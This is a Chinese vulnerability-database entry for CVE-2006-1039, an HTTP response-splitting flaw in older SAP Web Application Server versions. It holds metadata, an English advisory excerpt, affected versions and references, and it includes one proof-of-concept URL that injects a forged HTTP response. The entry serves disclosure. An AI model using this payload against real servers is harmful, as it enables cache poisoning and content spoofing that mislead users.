SAP网站应用服务器URI输入验证漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109224 漏洞类型 代码注入
发布时间 2005-11-09 更新时间 2006-05-17
CVE编号 CVE-2006-1039 CNNVD-ID CNNVD-200603-101
漏洞平台 Multiple CVSS评分 6.4
|漏洞来源
https://www.exploit-db.com/exploits/27887
https://www.securityfocus.com/bid/18006
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200603-101
|漏洞详情
SAP网站应用服务器(WebAS)内核7.0之前版本可以让远程攻击者输入任意字节到HTTP的响应中并获取敏感信息,或通过跟在经过编码的HTTP报头后的";%20"施加其它影响。
|漏洞EXP
source: http://www.securityfocus.com/bid/18006/info

SAP Web Application Server is prone to an input-validation vulnerability that results in HTTP response-splitting attacks. This issue is due to a failure in the application to properly sanitize user-supplied input.

A remote attacker may exploit this vulnerability to influence or misrepresent how web content is served, cached, or interpreted. This could aid in various attacks that attempt to entice client users into a false sense of trust.

http://sap-was/x.htm;%20HTTP%c0%af1.0%20200%20OK%c0%8d%c0%8aContent-Length:%2035%c0%8d%c0%8aContent-Type:text%c0%afhtml%c0%8d%c0%8a%c0%8d%c0%8a%3Chtml%3e%3cbody%3ehello%3c%c0%afbody%3e%3c%c0%afhtml%3e%c0%8d%c0%8a%c0%8d%c0%8a
|受影响的产品
SAP Web Application Server 7.0 SAP Web Application Server 6.40 SAP Web Application Server 6.20 SAP Web Application Server 6.10
|参考资料

来源:XF
名称:sap-was-url-obtain-information(25003)
链接:http://xforce.iss.net/xforce/xfdb/25003
来源:BID
名称:18006
链接:http://www.securityfocus.com/bid/18006
来源:BUGTRAQ
名称:20060301SAPWebApplicationServerhttprequesturlparsingvulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/426449/100/0/threaded
来源:VUPEN
名称:ADV-2006-0810
链接:http://www.frsirt.com/english/advisories/2006/0810
来源:SECTRACK
名称:1015702
链接:http://securitytracker.com/id?1015702
来源:SECUNIA
名称:19085
链接:http://secunia.com/advisories/19085